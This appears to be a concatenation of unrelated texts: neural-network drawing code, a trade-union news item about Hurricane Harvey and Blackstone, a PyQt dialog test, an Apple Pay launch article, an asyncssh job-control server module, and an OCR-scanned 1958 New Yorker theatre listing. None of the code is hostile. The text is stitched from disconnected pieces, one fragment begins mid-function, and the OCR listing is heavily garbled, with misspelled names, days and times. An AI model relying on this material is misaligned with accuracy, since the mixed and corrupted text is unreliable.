neuron_radius = 0.03
MAX_DEPTH = 64
# for every depth, count how many nodes are on this depth
all_depths = np.linspace(0.0, 1.0, MAX_DEPTH)
for depth in all_depths:
neuron_count = 0
for neuron in nn.neurons:
if AlmostEqual(neuron.split_y, depth, 1.0 / (MAX_DEPTH+1)):
neuron_count += 1
if neuron_count == 0:
continue
# calculate x positions of neurons
xxpos = rect_x_size / (1 + neuron_count)
j = 0
for neuron in nn.neurons:
if AlmostEqual(neuron.split_y, depth, 1.0 / (MAX_DEPTH+1)):
neuron.x = rect_x + xxpos + j * (rect_x_size / (2 + neuron_count))
j = j + 1
# calculate y positions of nodes
for neuron in nn.neurons:
base_y = rect_y + neuron.split_y
size_y = rect_y_size - neuron_radius
if neuron.split_y == 0.0:
neuron.y = base_y * size_y + neuron_radius
else:
neuron.y = base_y * size_y
# done, render the nn
return render_nn(nn, ax,
is_substrate=False,
details=details,
invert_yaxis=invert_yaxis)
# Faster Neural Network display code
# image is a NumPy array
# rect is a tuple in the form (x, y, size_x, size_y)
if not cvnumpy_installed:
def DrawPhenotype(image, rect, nn, neuron_radius=15,
max_line_thickness=3, substrate=False):
print("OpenCV/NumPy don't appear to be installed")
raise NotImplementedError
else:
MAX_DEPTH = 64
def DrawPhenotype(image, rect, nn, neuron_radius=15,
max_line_thickness=3, substrate=False):
for i, n in enumerate(nn.neurons):
nn.neurons[i].x = 0
nn.neurons[i].y = 0
rect_x = rect[0]
rect_y = rect[1]
rect_x_size = rect[2]
rect_y_size = rect[3]
if not substrate:
depth = 0
# for every depth, count how many nodes are on this depth
all_depths = np.linspace(0.0, 1.0, MAX_DEPTH)
for depth in all_depths:
neuron_count = 0
for neuron in nn.neurons:
if AlmostEqual(neuron.split_y, depth, 1.0 / (MAX_DEPTH+1)):
neuron_count += 1
if neuron_count == 0:
continue
# calculate x positions of neurons
xxpos = rect_x_size / (1 + neuron_count)
j = 0
for neuron in nn.neurons:
if AlmostEqual(neuron.split_y, depth, 1.0 / (MAX_DEPTH+1)):
neuron.x = rect_x + xxpos + j * (rect_x_size / (2 + neuron_count))
j = j + 1
# calculate y positions of nodes
for neuron in nn.neurons:
base_y = rect_y + neuron.split_y
size_y = rect_y_size - neuron_radius
if neuron.split_y == 0.0:
neuron.y = base_y * size_y + neuron_radius
else:
neuron.y = base_y * size_y
else:
# HyperNEAT substrate
# only the first 2 dimensions are used for drawing
# if a layer is 1D, y values will be supplied to make 3 rows
# determine min/max coords in NN
xs = [(neuron.substrate_coords[0]) for neuron in nn.neurons]
ys = [(neuron.substrate_coords[1]) for neuron in nn.neurons]
min_x, min_y, max_x, max_y = min(xs), min(ys), max(xs), max(ys)
#dims = [len(neuron.substrate_coords) for neuron in nn.neurons]
for neuron in nn.neurons:
# TODO(jkoelker) Make the rect_x_size / 15 a variable
neuron.x = Scale(neuron.substrate_coords[0], min_x, max_x,
rect_x_size / 15,
rect_x_size - rect_x_size / 15)
neuron.y = Scale(neuron.substrate_coords[1], min_y, max_y,
rect_x_size / 15,
rect_y_size - rect_x_size / 15)
# the positions of neurons is computed, now we draw
# connections first
if len(nn.connections) > 0:
max_weight = max([abs(x.weight) for x in nn.connections])
else:
max_weight = 1.0
if image.dtype in [np.uint8, np.uint16, np.uint32, np.uint,
np.int, np.int8, np.int16, np.int32]:
magn = 255.0
else:
magn = 1.0
for conn in nn.connections:
thickness = conn.weight
thickness = Scale(thickness, 0, max_weight, 1, max_line_thickness)
thickness = Clamp(thickness, 1, max_line_thickness)
w = Scale(abs(conn.weight), 0.0, max_weight, 0.0, 1.0)
w = Clamp(w, 0.75, 1.0)
if conn.recur_flag:
if conn.weight < 0:
# green weight
color = (0, magn * w, 0)
else:
# white weight
color = (magn * w, magn * w, magn * w)
else:
if conn.weight < 0:
# blue weight
color = (0, 0, magn * w)
else:
# red weight
color = (magn * w, 0, 0)
if magn == 255:
color = tuple(int(x) for x in color)
# if the link is looping back on the same neuron, draw it with
# ellipse
if conn.source_neuron_idx == conn.target_neuron_idx:
pass # todo: later
else:
# Draw a line
pt1 = (int(nn.neurons[conn.source_neuron_idx].x),
int(nn.neurons[conn.source_neuron_idx].y))
pt2 = (int(nn.neurons[conn.target_neuron_idx].x),
int(nn.neurons[conn.target_neuron_idx].y))
cv2.line(image, pt1, pt2, color, int(thickness))
# draw all neurons
for neuron in nn.neurons:
pt = (int(neuron.x), int(neuron.y))
a = neuron.activation
if a < 0:
clr = array([0.3,0.3,0.3]) + array([0, 0, .7]) * (-a)
else:
clr = array([0.3,0.3,0.3]) + array([.7, .7, .7]) * (a)
clr = clip(clr, 0, 1)
if image.dtype in [np.uint8, np.uint16, np.uint32, np.uint,
np.int, np.int8, np.int16, np.int32]:
clr = (clr*255).astype(np.uint8)
clr = tuple(int(x) for x in clr)
a = Clamp(a, 0.3, 2.0)
if neuron.type == NeuronType.INPUT:
cv2.circle(image, pt, int(neuron_radius*a), clr, thickness=-1) # filled
cv2.circle(image, pt, neuron_radius, (0,255,0), thickness=2) # outline
elif neuron.type == NeuronType.BIAS:
cv2.circle(image, pt, int(neuron_radius*a), clr, thickness=-1) # filled
cv2.circle(image, pt, neuron_radius, (0,0,0), thickness=2) # outline
elif neuron.type == NeuronType.HIDDEN:
cv2.circle(image, pt, int(neuron_radius*a), clr, thickness=-1) # filled
cv2.circle(image, pt, neuron_radius, (127,127,127), thickness=2) # outline
elif neuron.type == NeuronType.OUTPUT:
cv2.circle(image, pt, int(neuron_radius*a), clr, thickness=-1) # filled first
cv2.circle(image, pt, neuron_radius, (255,255,0), thickness=2) # outline
|
North America's Building Trades Unions (NABTU) says its members are "ready, willing and able" to assist with post-Hurricane Harvey cleanup and rebuilding efforts in Texas and Louisiana.
"Whenever a major natural or man-made disaster has struck the United States — including Hurricane Katrina, Superstorm Sandy, and the attacks on 9/11 — the men and women of [NABTU] have always responded in earnest, and we intend to do the same with regard to the tragedy that continues to unfold in Texas and Louisiana," the organization said in a statement. "Our members and our unions bring a unique and much-needed skillset to these types of situations, where a safe, highly trained and highly skilled construction craft workforce is invaluable to clean-up and re-building efforts.
"Further," NABTU added, "as residents and whole communities begin the arduous process of re-building homes, buildings and critical infrastructure, our apprenticeship-readiness and formal apprenticeship education and training system has proven to be an asset not only in ensuring that enough skilled craft professionals are available to do this work, but also to provide life-altering career training opportunities for local residents."
On a brighter note, NABTU and Blackstone on Sept. 5 announced a new agreement whereby the investment firm would adopt a Responsible Contractor Policy. Under the policy, Blackstone will cooperate with NABTU to include "responsible contractors" — i.e., those contractors who meet a set of criteria that promotes fair benefits, wages, working conditions and training opportunities — in the bidding and selection process for investments in the firm's dedicated infrastructure business. Earlier this year Blackstone announced a $20 billion commitment by Saudi Arabia to that sector of its business.
"Rebuilding our country's aging infrastructure will create badly needed jobs with good wages and benefits for construction workers throughout the United States," said Sean Klimczak, Senior Managing Director and Global Head of Blackstone's Infrastructure business. "At Blackstone, we have a strong track record of responsible engagement with workers, their labor union representatives, and the communities in which we invest. We are proud to partner with the NABTU in this effort because we believe a fairly compensated and well-trained workforce is critical to producing high-quality infrastructure projects that help drive local economic growth."
Sean McGarvey, President of the NABTU, added: "We are proud to partner with Blackstone on ensuring good jobs and pathways for disadvantaged communities in the launch of their dedicated infrastructure business. This agreement creates opportunities for our members and contractors, while strengthening job training for women, veterans and communities of color."
|
#!/usr/bin/env python
import pytest
import pytestqt
from PyQt4 import QtGui
from collections import OrderedDict
import sys,os
from Views import ui_dialog_obs as obs
from poplerGUI import ui_logic_preview as prev
from poplerGUI import class_modelviewpandas as view
from poplerGUI import class_inputhandler as ini
from poplerGUI.logiclayer import class_userfacade as face
from poplerGUI.logiclayer import class_helpers as hlp
rootpath = os.path.dirname(os.path.dirname( __file__ ))
end = os.path.sep
sys.path.append(os.path.realpath(os.path.dirname(
rootpath)))
os.chdir(rootpath)
@pytest.fixture
def ObsDialog(site_handle_free, file_handle_free, meta_handle_free):
class ObsDialog(QtGui.QDialog, obs.Ui_Dialog):
def __init__(self, parent=None):
super().__init__(parent)
self.setupUi(self)
# Facade set up for the taxa dialog
# box. These inputs will have been already
# logged in the computer in order to
# reach this phase
self.facade = face.Facade()
self.facade.input_register(meta_handle_free)
self.facade.meta_verify()
self.facade.input_register(file_handle_free)
self.facade.load_data()
self.facade.input_register(site_handle_free)
sitelevels = self.facade._data[
site_handle_free.lnedentry['study_site_key']].drop_duplicates().values.tolist()
self.facade.register_site_levels(sitelevels)
# Place holders for user inputs
self.obslned = {}
self.obsckbox = {}
self.obsraw = {}
self.available = None
self.null = None
# Place holder: Data Model/ Data model view
self.obsmodel = None
self.viewEdit = view.PandasTableModelEdit
# Placeholders: Data tables
self.obstable = None
# Placeholder: Director (table builder), log
self.obsdirector = None
self._log = None
# Placeholder for maindata Orms
self.obsorms = {}
# Actions
self.btnPreview.clicked.connect(self.submit_change)
self.btnSaveClose.clicked.connect(self.submit_change)
self.btnCancel.clicked.connect(self.close)
self.tablename = None
self.table = None
# Update boxes/preview box
self.message = QtGui.QMessageBox
self.error = QtGui.QErrorMessage()
self.preview = prev.TablePreview()
def submit_change(self):
sender = self.sender()
self.obslned = OrderedDict((
('spatial_replication_level_2', self.lnedRep2.text()),
('spatial_replication_level_3', self.lnedRep3.text()),
('spatial_replication_level_4', self.lnedRep4.text()),
('spatial_replication_level_5', self.lnedRep5.text()),
('structure_type_1', self.lnedStructure1.text()),
('structure_type_2', self.lnedStructure2.text()),
('structure_type_3', self.lnedStructure3.text()),
('structure_type_4', self.lnedStructure4.text()),
('treatment_type_1', self.lnedTreatment1.text()),
('treatment_type_2', self.lnedTreatment2.text()),
('treatment_type_3', self.lnedTreatment3.text()),
('unitobs', self.lnedRaw.text())
))
self.obsckbox = OrderedDict((
('spatial_replication_level_2', self.ckRep2.isChecked()),
('spatial_replication_level_3', self.ckRep3.isChecked()),
('spatial_replication_level_4', self.ckRep4.isChecked()),
('spatial_replication_level_5', self.ckRep5.isChecked()),
('structure_type_1', self.ckStructure1.isChecked()),
('structure_type_2', self.ckStructure2.isChecked()),
('structure_type_3', self.ckStructure3.isChecked()),
('structure_type_4', self.ckStructure4.isChecked()),
('treatment_type_1', self.ckTreatment1.isChecked()),
('treatment_type_2', self.ckTreatment2.isChecked()),
('treatment_type_3', self.ckTreatment3.isChecked()),
('unitobs', True)
))
self.table = {
'count_table': self.rbtnCount.isChecked(),
'biomass_table': self.rbtnBiomass.isChecked(),
'density_table': self.rbtnDensity.isChecked(),
'percent_cover_table': self.rbtnPercentcover.isChecked(),
'individual_table': self.rbtnIndividual.isChecked()
}
available = [
x for x,y in zip(
list(self.obslned.keys()), list(
self.obsckbox.values()))
if y is True
]
try:
self.tablename = [
x for x, y in
zip(list(self.table.keys()), list(self.table.values()))
if y is True
][0]
except Exception as e:
print(str(e))
self.error.showMessage('Select data type')
rawini = ini.InputHandler(
name='rawinfo',
tablename= self.tablename,
lnedentry= hlp.extract(self.obslned, available),
checks=self.obsckbox)
self.facade.input_register(rawini)
self.facade.create_log_record(self.tablename)
self._log = self.facade._tablelog[self.tablename]
try:
self.rawdirector = self.facade.make_table('rawinfo')
print('obs table build: ', self.rawdirector)
assert self.rawdirector._availdf is not None
except Exception as e:
print(str(e))
self._log.debug(str(e))
self.error.showMessage(
'Column(s) not identified')
raise AttributeError(
'Column(s) not identified: ' + str(e))
self.obstable = self.rawdirector._availdf.copy()
self.obsmodel = self.viewEdit(
self.obstable)
if sender is self.btnPreview:
self.preview.tabviewPreview.setModel(self.obsmodel)
self.preview.show()
elif sender is self.btnSaveClose:
self.facade.push_tables[self.tablename] = self.obstable
hlp.write_column_to_log(
self.obslned, self._log, self.tablename)
self.close()
return ObsDialog()
def test_dialog_site(qtbot, ObsDialog):
ObsDialog.show()
qtbot.addWidget(ObsDialog)
qtbot.stopForInteraction()
|
Apple Pay – The new mobile wallet function, which is expected to become available today (20 October), allows consumers to load details of their different credit and debit cards onto their mobile device and then use it to pay for purchases both in person and online.
All they have to do is either tap the merchant app that they have already loaded onto their phone to process an online payment, or they can tap the phone against a card machine to pay at the till in store.
MasterCard, Visa and American express were already involved by the time of the announcement, as were many of the biggest US banks. MasterCard is still working on signing up more institutions. But many smaller banks and lenders were apparently caught by surprise, and a substantial number have since rushed to catch up with the trend.
That said, getting the banks involved is one half of the problem. Merchant adoption is the other, and that’s where the system is currently a little less popular.
Big brands from McDonald’s and Macy’s to Texaco have all said they plan to accept Apple Pay, but the number of merchants signing up remains lower than it is for other forms of payment – even considering the popularity of contactless payments in general.
Whether it will encourage more mobile users to make purchases using their smartphones, or whether it will make Apple devices even more attractive to its loyal fans, remains to be seen. However, it looks as though Apple Pay is definitely heading in the right direction.
|
# Copyright (c) Paul R. Tagliamonte <tag@pault.ag>, 2015
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
import hashlib
import asyncio
import asyncssh
from moxie.facts import get_printable_fact
from aiocore import Service
MOTD = """
.,-:;//;:=,\r
. :H@@@MM@M#H/.,+%;,\r
,/X+ +M@@M@MM%=,-%HMMM@X/,\r
-+@MM; $M@@MH+-,;XMMMM@MMMM@+-\r
;@M@@M- XM@X;. -+XXXXXHHH@M@M#@/.\r
,%MM@@MH ,@%= .---=-=:=,.\r
=@#@@@MX.,\r
=-./@M@M$ ▗ ▌ ▗ ▐ ▗▀▖\r
X@/ -$MM/ ▛▚▀▖▞▀▖▚▗▘▄ ▞▀▖ ▞▀▘▞▀▘▛▀▖ ▄ ▛▀▖▜▀ ▞▀▖▙▀▖▐ ▝▀▖▞▀▖▞▀▖\r
,@M@H: :@: ▌▐ ▌▌ ▌▗▚ ▐ ▛▀ ▝▀▖▝▀▖▌ ▌ ▐ ▌ ▌▐ ▖▛▀ ▌ ▜▀ ▞▀▌▌ ▖▛▀\r
,@@@MMX, . ▘▝ ▘▝▀ ▘ ▘▀▘▝▀▘ ▀▀ ▀▀ ▘ ▘ ▀▘▘ ▘ ▀ ▝▀▘▘ ▐ ▝▀▘▝▀ ▝▀▘\r
.H@@@@M@+,\r
/MMMM@MMH/. XM@MH; =;\r
/%+%$XHH@$= , .H@@@@MX,\r
.=--------. -%H.,@@@@@MX,\r
.%MM@@@HHHXX$$$%+- .:$MMX =M@@MM%.\r
=XMMM@MM@MM#H;,-+HMM@M+ /MMMX=\r
=%@M@M#@$-.=$@MM@@@M; %M%=\r
,:+$+-,/H#MMMMMMM@= =,\r
=++%%%%+/:-.\r
\r
\r
\r
"""
COMMANDS = {}
def command(name):
def _(fn):
coro = asyncio.coroutine(fn)
COMMANDS[name] = coro
return coro
return _
class StopItError(Exception):
pass
@command("exit")
def exit(stdin, stdout, stderr, args=None):
raise StopItError("Exit called")
@asyncio.coroutine
def readl(stdin, stdout, echo=True):
buf = ""
while not stdin.at_eof():
bytes_ = (yield from stdin.read())
for byte in bytes_:
obyte = ord(byte)
if obyte == 0x08 or obyte == 127:
if buf != "":
stdout.write('\x08 \x08')
buf = buf[:-1]
continue
if obyte < 0x20:
if obyte == 0x03:
raise StopItError("C-c")
if obyte == 0x04:
raise EOFError("EOF hit")
if obyte == 13:
stdout.write("\r\n")
return buf.strip()
continue
if echo:
stdout.write(byte)
buf += byte
return buf
@asyncio.coroutine
def error(name, stdin, stdout, stderr):
stderr.write("""\
Error! Command {} not found!
""".format(name))
@command("list")
def list(stdin, stdout, stderr, *, args=None):
database = Service.resolve("moxie.cores.database.DatabaseService")
jobs = yield from database.job.list()
for job in jobs:
stdout.write("[%s] - %s - %s\n\r" % (job.name, job.image, job.command))
@command("run")
def run(stdin, stdout, stderr, *, args=None):
run = Service.resolve("moxie.cores.run.RunService")
if len(args) != 1:
stderr.write("Just give me a single job name")
return
name, = args
stdout.write("Starting job %s...\r\n" % (name))
try:
yield from run.run(name, 'ssh')
except ValueError as e:
stderr.write(str(e))
return
stdout.write(" Wheatley: Surprise! We're doing it now!\r\n")
stdout.write("\n\r" * 3)
yield from attach(stdin, stdout, stderr, args=args)
@command("running")
def running(stdin, stdout, stderr, *, args=None):
container = Service.resolve("moxie.cores.container.ContainerService")
database = Service.resolve("moxie.cores.database.DatabaseService")
jobs = (yield from database.job.list())
running = (yield from container.list(all=True))
nmap = {z: x for x in [x._container for x in running] for z in x['Names']}
for job in jobs:
cname = "/{}".format(job.name)
container = nmap.get(cname, {})
if container is None:
pass
stdout.write("{name} - {status}\n\r".format(
name=job.name,
status=container.get('Status', "offline")
))
return
@command("kill")
def kill(stdin, stdout, stderr, *, args=None):
container = Service.resolve("moxie.cores.container.ContainerService")
if len(args) != 1:
stderr.write("Just give me a single job name\r")
return
name, = args
stdout.write("Killing job %s...\r\n\r\n" % (name))
stdout.write(
" GLaDOS: Ah! Well, this is the part where he kills us.\r\n"
)
try:
yield from container.kill(name)
except ValueError as e:
stderr.write(str(e))
return
stdout.write(
" Wheatley: Hello! This is the part where I kill you!\r\n\r\n"
)
stdout.write("Job terminated")
def aborter(stdin, *peers):
while True:
stream = yield from stdin.read()
if ord(stream) == 0x03:
for peer in peers:
peer.throw(StopItError("We got a C-c, abort"))
return
@command("attach")
def attach(stdin, stdout, stderr, *, args=None):
container = Service.resolve("moxie.cores.container.ContainerService")
if len(args) != 1:
stderr.write("Just give me a single job name")
return
name, = args
try:
container = yield from container.get(name)
except ValueError as e:
stderr.write(str(e))
return
@asyncio.coroutine
def writer():
logs = container.logs
logs.saferun()
queue = logs.listen()
while logs.running:
out = yield from queue.get()
stdout.write(out.decode('utf-8'))
# raise StopItError("Attach EOF")
stdout.write("[ process complete ]\r\n")
w = writer()
try:
yield from asyncio.gather(w, aborter(stdin, w))
except StopItError:
return
def handler(key, user, container):
@asyncio.coroutine
def handle_connection(stdin, stdout, stderr):
if user is None:
stderr.write("""\
\n\r
SSH works, but you did not provide a known key.\n\r
This may happen if your key is authorized but no User model is created\r
for you yet. Ping the cluster operator.\r
Your motives for doing whatever good deed you may have in mind will be\r
misinterpreted by somebody.\r
\r
Fingerprint: {}
\n\r
""".format(hashlib.sha224(key.export_public_key('pkcs1-der')).hexdigest()))
stdout.close()
stderr.close()
return
stdout.write("Hey! I know you! You're {}\n\r".format(user.name))
stdout.write(MOTD)
stdout.write("\r\n{}\r\n\r\n".format(get_printable_fact()))
while not stdin.at_eof():
stdout.write("* ")
try:
line = yield from readl(stdin, stdout)
except asyncssh.misc.TerminalSizeChanged:
stdout.write("\r")
continue
except (StopItError, EOFError):
stdout.close()
stderr.close()
break
if line == "":
continue
cmd, *args = line.split()
if cmd in COMMANDS:
yield from COMMANDS[cmd](stdin, stdout, stderr, args=args)
else:
yield from error(line, stdin, stdout, stderr)
stdout.write("\r\n")
stdout.close()
stderr.close()
return handle_connection
class MoxieSSHServer(asyncssh.SSHServer):
_keys = None
container = None
user = None
def begin_auth(self, username):
self.container = username
return True
def session_requested(self):
return handler(self.key, self.user, self.container)
def public_key_auth_supported(self):
return True
def validate_public_key(self, username, key):
self.key = key
if self._keys is None:
return False
valid = key in self._keys
if valid is False:
return False
self.user = self._keys[key]
return True
def fingerprint(key):
return hashlib.sha224(key.export_public_key('pkcs1-der')).hexdigest()
class SSHService(Service):
identifier = "moxie.cores.ssh.SSHService"
@asyncio.coroutine
def __call__(self):
database = Service.resolve("moxie.cores.database.DatabaseService")
# self.alert = CronService.resolve("moxie.cores.alert.AlertService")
# register an ssh callback for each thinger
ssh_host_keys = asyncssh.read_private_key_list('ssh_host_keys')
if MoxieSSHServer._keys is None:
authorized_keys = {}
for key in asyncssh.read_public_key_list('authorized_keys'):
authorized_keys[key] = (yield from
database.user.get_by_fingerprint(
fingerprint(key)))
MoxieSSHServer._keys = authorized_keys
obj = yield from asyncssh.create_server(
MoxieSSHServer, '0.0.0.0', 2222,
server_host_keys=ssh_host_keys
)
return obj
|
2 GOINGS ON ABOUT TOWN THE THEA TR.E (This week and next, some theatres, as in- dicated below, are rearranging their schedule because of Christmas and N e\v Year's Day. . . . q E. and \V. l11ean East and West of Broad- \\ av.) PLA YS THE COLD WIND AND THE W ARM-S N. Behr- l11an's fuzzy tragicomedy about Jewish life and love in \Y orcester, Massachusetts, half a century ago. \Vith Eli Wallach (miscast), and Maureen Stapleton, who plays a buoyant matchmaker. (110rosco, 45th St., W. CI 6- 6230. Xightly, except Sundays, at 8:40. Mat- inees \Vednesdays and Saturdays at 2:40.) CUE FOR PASSION-A neurotic triangle (mother, son, and stepfather) worked up by Elmer Ricè into a pretentious paraphrase of "Ham- let." John Kerr is the angry young stepson, Diana Wynyard the lady of his choice. (Hen- ry Miller, 43rd St., E. BR 9-3970. Nightly, except Sundays, at 8:40. 11atinées Thursdays and Saturdays at 2:40.) THE DISENCHANTED-Jason Robards, Jr., does a fine job as the hero of this account of the last sad days of a writer who resembles F. Scott Fitzgerald, but the play, written by Budd Schulberg and Harvey Breit, is an uneven work. (Coronet, 49th St.,. W. CI 6-8870 Xightly, except Sundays, at 8:30. Matinées \Vednesdays and Saturdays at 2:30.) THE GAZEBo-Alec Coppel's frail comedy about a TV writer who gets mixed up in a sus- pected murder is valiantly played by Walter Slezak and Jayne 11eadows. The dialogue, however, is a constant drag. (Lyceuln, 45th St., E. J1-- 2-3897. Nightly, except Sundays, at 8:40. Matinées Wednesdays and Satur- days at 2:40.) THE GIRLS IN 509-A. play that makes wide, satir- ical gestures but delivers nothing but jokes. Peggy \V ood and Imogene Coca are as funny as they can 111anage to be in the roles of a pair of Republican fugitives from Socialism (Belasco, 44th St., E. JU 6-7950. Kightly, except Sundays, at 8:40. 11atinées Wednes- days, except Dec. 31, and Saturdays at 2:40' special nlatinées Friday, Dec. 26, and Ne\ Year's Day.) J. B.- obody could have got more dramatic 11101nentu111 out of the Book of Job than Elia Kazan, who directed this fuddled moderniza- tion. by Archibald MacLeish, of the Bihlical tragedy. Pat Hingle, Christopher Plulnmer, and Raymond Massey do what they can with a grinl script. (A.XT l\. Theatre, 52nd St., W. CI 6-6 2 70. ightly, except Sundays, at 8:45. lHatinées Wednesdays, except Dec. 3 I, and Saturdays at 2:45, special matinées Friday, Dec. 26, and Kew Year's Day.) MAKE A MILLION-Sam Levene in a comedy \\ ritten by N onnan Barasch and Carroll Ioore, and directed by Jerome Chodorov. (Playhouse, 48th St., E. CI 5-6060. Nightly, except Sundays, at 8:40. Matinées vVednes- days and Saturdays at 2:40.) THE MARRIAGE-Go-RoUND- There is nothing par- ticularly original in this comedy by Leslie Ste\iens, 'which has to do with the difficulties of a happily married professor trying to keep his 1110noga1110us balance while being pursued by a S\\,edish i\lnazon, but Charles Boyer, Claudette Colbert, and Julie N eWl11ar fre- quently sparkle in the principal roles. (Plym- outh, 45th St., W. CI 6-9156. Nightly, except Sundays, at 8:40. 11atinées Wednesdays and Saturdays at 2:40; special matinée Friday, Dec. 26.) OLD Vlc-A five-week repertory of three Shakespearean plays, presented by S. Hurok. The ::,chedule through Jan. 3. "Henry V," \\ ith Laurence Harvey and 11argaret Cour- tenay, Thursday, Dec. 25, at 7:30; Friday, Dec. 26, at 8:30; and Saturday and Sunday, Dec. 27-28, at 2:30 and 8:30. . . . CjJ "Twelfth Kight," ,vith John Neville and Barbara J ef- ford, Tuesday through Friday, Dec. 30-Jan. 2, at 8: 30. . . . CjJ "Halnlet," also with John Neville and Barbara J efford, Saturday, Jan. 3, at 2:30 and 8. (Broadway Theatre, Broad- way at 53rd St. CI 7-7992. Through Satur- day, Jan. 10.) Nightly, except Mondays, at 8:40. Matinées Saturdays and Sundays at 2:40.) A TOUCH OF THE POET-Eugene O''Jeill's play about life in the United States back in the Colonial period. A satisfactory dranla that has the estimable services of Helen Hayes. This is its first American production. (Helen Hayes, 46th St., W. CI 6-6380. Nightly, ex- cept Sundays, at 8:30. Matinées Wednesdays, except Dec. 3 I, and Saturdays at 2: 30; special matinée New Year's Day) THE WORLD OF SUZIE WONG-A.. snlall, trite hymn to love in Hong Kong, lavishly orchestrated, and played with quiet skill and sincerity by a new actress named France Nuyen. Others . in the cast are \Villiam Shatner and Ron Randell. (Broadhurst, 44th St., W. CI 6- 6699. Nightly, except Sundays, at 8.40. Mati- nées \Vednesdays, except Dec. 31, and Sat- urdays at 2:40; special matinees Christmas and New Year's Day.) LONG RUNS-THE DARK AT THE TOP OF THE STAIRS: Oklahoma family life in the nineteen-twen- ties. Teresa VV right, i\udrey Christie, and George L. Smith have the leading roles in \Villiam Inge's play (Music Box, 45th St., VV. CI 6-4636. Nightly, except Sundays, at 8:40. 11atinées Wednesdays and Satur- days at 2:40; special matinée Friday, Dec. 26. Closes Saturday, Jan. 17..). . . LOOK HOME- WARD. ANGEL: Thomas Wolfe's monumental novel reduced by Ketti Frings to a coherent play Now with 11iriam Hopkins and Ed Begley. (Ethel Barrymore, 47th St., W. CI 6-0390. Xightly, except Sundays, at 8:40. 11atinées vVednesdays, except Dec. 31, and Saturdays at 2:40; special matinee New Year's Day.) . . . SUNRISE AT CAMPOBElLO: Ralph Bellamy as Franklin D. Roosevelt in Dore Schary's play centering on three crucial years in the late President's life. (Cort, 48th St., E. CI 5-4289. Nightly, except Sundays, at 8:40. Matinées vVednesdays and Saturdays at 2:40.). . TWO FOR THE SEESAW: Dana i\n- drews and Anne Bancroft are the whole cast of \Villiam Gibson's play about a couple of lonely people in New York. (Booth, 45th St., vV. CI 6-5969. Nightly, except Sundays, at 8:40. 11atinees Wednesdays, eÀcept Dec. 31, and Saturdays at 2:40; special nlatinée New Year's Day.) MUSICALS -'\ FLOWER DRUM SONG-The new musical by Rodg- ers and Hammerstein concerns a romantic imbroglio in San Francisco's Chinatown, and shows the great men at less than their best. Pat Suzuki, wIiyoshi Umeki, and Larry Bly- den perform brisk salvage work. (St. James, 44th St., \V. Li\ 4-4664. Nightly, except Sun- days, at 8:30. 11atinées Wednesdays and Saturdays at 2:30.) GOLDILOCKs-Elaine Stritch and Don ...t\meche in a handsomely dressed musical treatment of early motion-picture days that is fast, funny, and sometimes even thoughtful. Book by Jean and vValter Kerr, music by Leroy Anderson, and lyrics by Joan Ford and the Kerrs. (Lunt-Fontanne, 46th St., W. JU 6- 5555. Xightly, except Sundays, at :30. 11at- inées \tVednesdays and Saturdays at 2:30.) LA PL.UME DE MA T ANTE-...t\ stimulating importa- tion from France, \vhich has been beguiling audiences in Europe for a decade and ,vill probably do the same for you. ...t\ creation of Robert Dhéry, who is also the most promi- nent performer, the revue includes such other sound types as Colette Brosset, Pierre Olaf, Roger Caccia, and Jacques Legras. They ,;peak English when speaking is absolutely necessary. (Royale, 45th St., W. CI 5-5760. Nightly, except Sundays, at 8:30. 11atinees vVednesdays, except Dec. 31, and Saturdays at 2:30; special matinées Christmas and Tuesday, Dec. 30.) LONG RUNS-BELLS ARE RINGING: Judy Holliday as a telephone-answering-service girl who is dedicated to her job. (Alvin, 52nd St., W. CI 5-5226. Nightly, except Sundays, at 8:30. 11atinees Wednesdays, except Dec. 31, and Saturdays at 2:30; special matinée New Year's Day.) . . . JAMAICA: ...t\ tale of old West India, featuring Lena Horne. Harold ...t\r1en composed the music and E. Y. Harburg the lyrics. (Imperial, 45th St., W. CO 5-2412. S.M.T.W.T.F.S 25 26 27 28 29 JO JI I 2 J ONCE MORE. WITH FEELING-A farce about the symphony-concert business that has a few bright lines in it, and a great deal of non- sense \\Tith Arlene Francis, Joseph Cotten, and Joseph Buloff. (National, 41st St., \\T. \V] 7-5510. Nightly, except Sundays, at 8:40. Matinées Wednesdays and Saturdays at 2:40.) THE PLEASURE OF HIS COMPANy-Cyril Ritchard has given smooth direction and a polished performance to this somewhat sententious comedy, by Samuel Taylor and Cornelia Otis Skinner, about family life in San Francisco. The cast also includes Charlie Ruggles, \Valter Abel, Dolores Hart, and 11iss Skin- ner herself. (Longacre, 48th St., W. CI 6- 5639. Nightly, except Sundays, at 8:40. lVlatinées \tVednesdays and Saturdays at 2:40.) SAY. DARLING-This very successful backstage comedy is partly the work of Richard Bissell, \vho also wrote the novel on which it is based. Betty Comden, ...t\dolph Green, and J ule Styne contributed nine songs, and Eddie ...t\lbert, Vivian Blaine, and Johnny Desmond are in the large and gifted cast. (:Nlartin Beck, 45th St., W. CI 6-6363. Nightly, except Sun- days, at 8:40. Matinées \Vednesdays, except Dec. 31, and Saturdays at 2:40; special matinées Christmas and New Year's Day.) THE SHADOW OF A GUNMAN-Sean O'Casey's bril- liant early tragicomedy about Dublin in the troubled twenties. The production, an ...t\ctors' Studio effort featuring William Smithers and Gerald O'Loughlin, is more than a little la- borious. (Bijou, 45th St., W. JU 6-5442. r" ....; THE ART GALLERIES BOOKS THE CURRENT CINEMA MUSICAL EVENTS THE THEATRE THE. NE. W YORKER 25 WE-ST 4JRD STR,E.E. T TELEPHONE ADVE.R TISlt-oG " SUßSCRIPTIONS. OXfOR.D .5-1.51.) EDITORIAL OffiCES. OXFORD .5-1414 Page 61 66 60 64 52 THE NEW YORKER, published weekly by The New Yorker Magazine, 